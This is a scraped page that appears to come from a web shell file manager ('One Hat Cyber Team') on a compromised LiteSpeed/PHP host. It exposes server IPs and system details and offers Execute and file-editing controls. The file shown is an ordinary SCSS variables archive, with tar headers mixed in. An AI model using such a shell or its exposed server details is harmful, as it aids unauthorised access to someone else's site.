One Hat Cyber Team
Your IP:
216.73.216.176
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
proc
/
self
/
root
/
proc
/
thread-self
/
cwd
/
Edit File:
_variables.scss.tar
home/fluxyjvi/public_html/assets/front/sass/_abstracts/_variables.scss 0000644 00000005216 15105603606 0022420 0 ustar 00 $bootstrap-sass-asset-helper: false !default; $title: #3d065f; $success-color: #0ead69; $secondary-color: #4c6572; $danger-color: #d90429; $warning-color: #ee9b00; $info-color: #00b4d8; $primary-color: #0c67a3; // var(--border-clr): #e8eaff; $ash-color: #fafafa; $white: #fff; $lallu-color: #e883ae; $dark-color: #192a56; $dark-bg: #131b32; $light-color: #daddff; $black: #000; $section-bg-2: #fafafa; $whatsapp: #25d366; $facebook: #3b5998; $twitter: #55acee; $linkedin: #007bb5; $pinterest: #007bb5; $skype: #2fb7df; $youtube: #cd201f; $google: #dd4b39; $camera: #e4405f; $instagram: #e4405f; $tumblr: #34465d; $behance: #1769ff; $star: #e9ba17; $green: #0be881; $green-h: #0fbcf9; $red: #f53b57; $yellow: #dec32b; $nell: #212fb4; $navy: #d8e0f3; $placeholder: #a1a1a2; $name-dec: #3f485d; $futbol: #db3776; $vimeo: #1ab7ea; $dribble: #ea4c89; $transition: all ease 0.3s; $base2: #92278f; $base3: #8dc63f; $base4: #00bfff; .bg--gradient-light { background: #f3f9ff; } .bg--gradient, .bg--shapes::before { background: linear-gradient( to left top, #45108a, #440d7f, #420a74, #400769, #3d065f ); background-repeat: no-repeat; background-size: cover; background-attachment: fixed; background-position: center center; } :root { --base-clr: #d5a953; --base-rgb: 213, 170, 83; --body-clr: #536479; --title-clr: #3d065f; --title-rgb: 61, 6, 95; --body-bg: #ffffff; --section-bg: #f3f9ff; --dark-clr: #3d065f; --dark-rgb: 61, 6, 95; --white-clr: #ffffff; --white-rgb: 255, 255, 255; --primary-clr: #0c67a3; --primary-rgb: 12, 103, 163; --border-clr: #e5e5e5; --border-dark: #283c40; --border-dark-only: transparent; --heading-fonts: "Jost", sans-serif; --body-fonts: "Roboto", sans-serif; --base-shadow-sm: 0 0 1px var(--base-clr), 0 0 3px var(--base-clr); --base-shadow: 0 0 1px var(--base-clr), 0 0 2px var(--base-clr), 0 0 3px var(--base-clr), 0 0 5px var(--base-clr), 0 0 7px var(--base-clr); --light-clr: #daddff; } .dark-theme { --base-clr: #d5a953; --base-rgb: 213, 170, 83; --body-clr: #daddff; --title-clr: #ffffff; --title-rgb: 255, 255, 255; --section-bg: #11272c; --body-bg: #0e2429; --dark-clr: #142120; --dark-rgb: 20, 33, 32; --white-clr: #ffffff; --white-rgb: 255, 255, 255; --border-clr: #283c40; --border-dark: #283c40; --border-dark-only: #283c40; .bg--shapes::before, .bg--gradient, .bg--gradient-light { background: linear-gradient( to left top, #142135, #0b2231, #0a232b, #0e2225, #142120 ); background-repeat: no-repeat; background-size: cover; background-attachment: fixed; background-position: center center; } .bg--shapes::before { background: rgba(var(--white-rgb), 0.031); } } home/fluxyjvi/public_html/assets/admin/scss/_variables.scss 0000644 00000004236 15111300322 0020220 0 ustar 00 // Override Bootstrap default variables here // Do not edit any of the files in /vendor/bootstrap/scss/! // Color Variables // Bootstrap Color Overrides $white: #fff !default; $gray-100: #f8f9fc !default; $gray-200: #eaecf4 !default; $gray-300: #dddfeb !default; $gray-400: #d1d3e2 !default; $gray-500: #b7b9cc !default; $gray-600: #858796 !default; $gray-700: #6e707e !default; $gray-800: #5a5c69 !default; $gray-900: #3a3b45 !default; $black: #000 !default; $blue: #4e73df !default; $indigo: #6610f2 !default; $purple: #6f42c1 !default; $pink: #e83e8c !default; $red: #e74a3b !default; $orange: #fd7e14 !default; $yellow: #f6c23e !default; $green: #1cc88a !default; $teal: #20c9a6 !default; $cyan: #36b9cc !default; // Custom Colors $brand-google: #ea4335; $brand-facebook: #3b5998; // Set Contrast Threshold $yiq-contrasted-threshold: 195 !default; // Typography $body-color: $gray-600 !default; $font-family-sans-serif: "Nunito", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", 'Noto Color Emoji' !default; $font-weight-light: 300 !default; // $font-weight-base: 400; $headings-font-weight: 400 !default; // Shadows $box-shadow-sm: 0 0.125rem 0.25rem 0 rgba($gray-900, .2) !default; $box-shadow: 0 0.15rem 1.75rem 0 rgba($gray-900, .15) !default; // $box-shadow-lg: 0 1rem 3rem rgba($black, .175) !default; // Borders Radius $border-radius: 0.35rem !default; $border-color: darken($gray-200, 2%); // Spacing Variables // Change below variable if the height of the navbar changes $topbar-base-height: 4.375rem; // Change below variable to change the width of the sidenav $sidebar-base-width: 14rem; // Change below variable to change the width of the sidenav when collapsed $sidebar-collapsed-width: 6.5rem; // Card $card-cap-bg: $gray-100; $card-border-color: $border-color; // Adjust column spacing for symmetry $spacer: 1rem; $grid-gutter-width: $spacer * 1.5; // Transitions $transition-collapse: height .15s ease !default; // Dropdowns $dropdown-font-size: 0.85rem; $dropdown-border-color: $border-color;
Simpan